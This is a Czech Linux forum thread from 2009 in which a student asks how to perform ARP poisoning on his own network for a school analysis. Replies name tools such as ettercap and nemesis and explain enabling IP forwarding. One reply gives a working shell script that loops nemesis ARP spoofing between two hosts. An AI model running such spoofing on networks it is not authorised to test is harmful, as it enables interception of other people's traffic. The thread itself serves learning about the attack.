abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    včera 20:44 | Zajímavý software

    Byly publikovány zdrojové kódy počítačové hry Unturned. Pro nekomerční účely. V plánu je přelicencování pod MIT. Hra Unturned je postavena nad multiplatformním herním enginem Unity.

    Ladislav Hagara | Komentářů: 0
    včera 15:55 | IT novinky

    První česká družice navržená a sestavená výhradně studenty se dostala na oběžnou dráhu Země. Družice KOSTKA, kterou vyvinul studentský tým YSpace z Vysokého učení technického v Brně (VUT), dnes odstartovala na palubě rakety Falcon 9 společnosti SpaceX v rámci mise Transporter-17 z kalifornské základny Vandenberg Space Force Base.

    Ladislav Hagara | Komentářů: 0
    včera 05:00 | IT novinky

    Po nákresech ovladače Steam Controller a puku společnost Valve na svém GitLabu publikovala projekt Inkterface, tj. podrobný návod (PDF, video v mp4) na sestavení předního panelu s e-papírovým displejem pro Steam Machine pro zobrazování systémových informací. Použity jsou součástky od společnosti Adafruit.

    Ladislav Hagara | Komentářů: 0
    včera 04:00 | Bezpečnostní upozornění

    V jádře Linux byla nalezena a v dubnu letošního roku v upstreamu opravena kritická zranitelnost Bad Epoll aneb CVE-2026-46242. Jedná se o zranitelnost typu "race-condition use-after-free", která běžnému uživateli umožňuje získat práva roota. Na distribucích Linuxu i na Androidu. Dokonce i zevnitř sandboxu prohlížeče Chrome. Chyba byla do Linuxu zavedena v dubnu 2023, tj. Linux 6.4.

    Ladislav Hagara | Komentářů: 0
    6.7. 23:22 | Nová verze

    Byla vydána nová verze 10.4 sady aplikací pro SSH komunikaci OpenSSH. Přináší řadu důležitých bezpečnostních oprav, vylepšení funkcí a oprav chyb. Vyzkoušet lze experimentální podporu postkvantového algoritmu mldsa44-ed25519.

    Ladislav Hagara | Komentářů: 0
    6.7. 16:33 | Zajímavý projekt

    Open Printer je otevřená kompaktní tiskárna od Open Tools. Brzy by měla být spuštěna kampaň na její podporu na Crowd Supply. Současně by měly být uvolněny zdrojové kódy. Postavena je na Raspberry Pi Zero W a STM32. Používá inkoustové kazety HP 302.

    Ladislav Hagara | Komentářů: 2
    6.7. 15:11 | Nová verze

    Byla vydána nová verze 3.28.0 FreeRDP, tj. svobodné implementace protokolu RDP (Remote Desktop Protocol). Opraveno bylo 8 zranitelností.

    Ladislav Hagara | Komentářů: 0
    4.7. 23:33 | IT novinky

    Čeští policisté společně se svými tureckými kolegy zadrželi 51 lidí, kteří se podle kriminalistů podíleli na provozu podvodného call centra v Istanbulu. Skupina je spojena s 1173 případy podvodů na českých občanech, při kterých vznikla škoda přes 553 milionů korun.

    Ladislav Hagara | Komentářů: 7
    3.7. 03:55 | Nová verze

    Immich byl vydán v nové verzi 3.0.0. Jedná se o alternativu k výchozím aplikacím od Googlu a Applu pro správu fotografií a videí umožňující vlastní hosting serveru Immich. K vyzkoušení je demo. Immich je součástí balíčků open source aplikací FUTO. Zdrojové kódy jsou k dispozici na GitHubu pod licencí AGPL-3.0.

    Ladislav Hagara | Komentářů: 5
    3.7. 02:55 | IT novinky

    Společnost Juno Computers prodávající počítače s předinstalovaným Linuxem má nově v nabídce linuxový tablet Juno Tab 4 - WiFi. Na výběr je Debian, Ubuntu a Kubuntu. Předobjednat jej lze za 949 liber (26 500 korun).

    Ladislav Hagara | Komentářů: 0
    Které desktopové prostředí na Linuxu používáte?
     (10%)
     (8%)
     (2%)
     (17%)
     (31%)
     (4%)
     (6%)
     (2%)
     (16%)
     (25%)
    Celkem 2073 hlasů
     Komentářů: 30, poslední 3.4. 20:20
    Rozcestník
    Štítky: není přiřazen žádný štítek


    Dotaz: Arp poisoning

    29.10.2009 14:57 Marek Adamovsky
    Arp poisoning
    Přečteno: 797×
    Dobry den, rad bych na sve siti provedl ARP poisoning, abych mohl tento utok analyzovat a popsat jako praci do skoly. Muzete mi prosim poradit jakou aplikaci na ARP poisoning pouzit?

    Odpovědi

    Cubic avatar 29.10.2009 15:21 Cubic | skóre: 24 | blog: obcasne_vyplody | Essex
    Rozbalit Rozbalit vše Re: Arp poisoning
    google nic? zacit muzes s ettercap
    29.10.2009 16:49 Marek Adamovsky
    Rozbalit Rozbalit vše Re: Arp poisoning
    Dekuji, prave to zkousim. Podle tohoto navodu: http://openmaniak.com/ettercap_arp.php Data zachytavam Wiresharkem, jenze mi to funguje tak na pul. "Otraveny" host posle pozadavek (treba na nacteni stranky) na router, ja ho ale u sebe nevidim. Vidim pouze odpoved, ktera prijde.

    Je to jako kdyby host nebyl otraveny a posilal data spravne na router a router byl otraveny a posilal data ke mne. Je neco takoveho mozne? V cem muze byt chyba?

    A jeste bych se chtel zeptat, jestli je toto ok:
    $ cat /proc/sys/net/ipv4/ip_forward
    0
    
    Cubic avatar 29.10.2009 17:22 Cubic | skóre: 24 | blog: obcasne_vyplody | Essex
    Rozbalit Rozbalit vše Re: Arp poisoning

    nevim, jen jsem si vzpomnel ze to je v ettercapu mozne ale predpokladam ze

    echo 1 > /proc/sys/net/ipv4/ip_forward
    potreba bude
    29.10.2009 17:33 Marek Adamovsky
    Rozbalit Rozbalit vše Re: Arp poisoning
    A nevite proc nejde toto:
    $ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
    bash: /proc/sys/net/ipv4/ip_forward: Permission denied
    
    Pokud se ale prepnu na roota pres su tak to jde, ale ja bych to rad umistil do skriptu.
    Bilbo avatar 29.10.2009 17:51 Bilbo | skóre: 29
    Rozbalit Rozbalit vše Re: Arp poisoning
    Protoze to provede prikaz "echo 1" pod rootem a jeho vystup (uz pod normalnim uzivatelem) presmeruje do /proc/sys/net/ipv4/ip_forward

    Musi se to ouvozovkovat:

    sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'

    pak se to spusti spravne cele jako prikaz pod rootem
    Big brother is not watching you anymore. Big Brother is telling you how to live...
    8.11.2009 09:32 Marek Adamovsky
    Rozbalit Rozbalit vše Re: Arp poisoning
    Stale nic:
    $ sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'
    sudo: echo 1 > /proc/sys/net/ipv4/ip_forward: command not found
    
    8.11.2009 11:30 l4m4
    Rozbalit Rozbalit vše Re: Arp poisoning
    sudo takhle nefunguje (tj. nenechává napsané interpretovat shellem), protože by to citelně zkomplikovalo omezení, když má uživatel povoleno spouštět jen určité věci. sudo prostě napsané exec-ne.

    a) spouštěj to v rootovském shellu

    b) dej to do skriptu, ten pak můžeš spouštět přes sudo
    Bilbo avatar 8.11.2009 15:20 Bilbo | skóre: 29
    Rozbalit Rozbalit vše Re: Arp poisoning
    No, pokud je sudo "neomezene" (osobne sudo nepouzivam, jen su, takze ho moc neznam, ale tusim nejak takhle je nastaveno treba ve vychozi konfiguraci Ubuntu), tak i s tim shellem by to slo, asi by se muselo pouzit neco jako:

    sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

    nebo

    sudo "sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'"

    Nebo ten skript :)
    Big brother is not watching you anymore. Big Brother is telling you how to live...
    29.10.2009 16:17 NN
    Rozbalit Rozbalit vše Re: Arp poisoning
    nemesis (odzkouseno :D )

    NN
    29.10.2009 19:40 faha
    Rozbalit Rozbalit vše Re: Arp poisoning

    Zdravim, je to vcelku "trivialni" utok a take je pomerne dobre popsany, hezky je to popsane v knize Linux hackerské útoky.

    Jeden z pouzivanych nastroju je nemesis, najdete ho alespon v debianu primo v repositari.

    nemesis - TCP/IP Packet Injection Suite

    Jeste prikladam skriptik jak to udelat...

    ----

    #!/bin/sh

    SOURCEMAC=""
    SOURCEIP=""

    DESTMAC=""
    DESTIP=""

    MYMAC=""
    MYIP=""

    while true
    do
    # 1
    /usr/bin/nemesis arp -v -r -d eth0 -S $DESTIP -D $SOURCEIP -h $MYMAC -m $SOURCEMAC -H $MYMAC -M $SOURCEMAC

    # 2
    /usr/bin/nemesis arp -v -r -d eth0 -S $SOURCEIP -D $DESTIP -h $MYMAC -m $DESTMAC -H $MYMAC -M $DESTMAC
    echo "Injecting ... "
    sleep 10
    done
    ----

    Jendа avatar 29.10.2009 20:42 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Arp poisoning
    29.10.2009 21:29 pht | skóre: 48 | blog: pht
    Rozbalit Rozbalit vše Re: Arp poisoning
    Na to stačí arping. Jinak, zkuste si najít "hunt".
    In Ada the typical infinite loop would normally be terminated by detonation.

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.